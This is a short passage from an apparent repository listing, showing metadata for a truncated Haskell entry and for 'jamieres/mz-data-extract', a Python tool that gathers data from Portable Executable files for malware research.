Language: Haskell - Size: 75.2 KB - Last synced: about 1 year ago - Pushed: over 5 years ago - Stars: 3 - Forks: 1

jamieres/mz-data-extract

Simple tool for collecting relevant data from Portable Executable (PE) files, for use as intelligence during malware research.

Language: Python - Size: 657 KB - Last synced: about 1 year ago - Pushed: almost 7 years ago - Stars: 1 - Forks: 2